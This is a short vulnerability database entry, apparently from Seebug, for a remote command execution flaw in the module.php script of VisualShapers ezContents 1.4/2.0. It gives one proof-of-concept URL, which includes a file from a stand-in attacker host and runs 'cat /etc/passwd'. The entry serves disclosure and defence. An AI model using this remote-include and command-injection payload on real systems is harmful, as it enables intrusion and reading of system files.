VisualShapers EZContents 1.4/2.0 Module.PHP Remote Command Execution Vulnerability

2014-07-01T00:00:00
ID SSV:77297
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/9396/info

A problem in handling of specific types of input passed to the module.php script in VisualShapers ezContents has been discovered. Because of this, an attacker may be able to gain unauthorized access to vulnerable systems.

http://www.example.com/module.php?link=http://attacker.example.com/index.php&cmd=cat /etc/passwd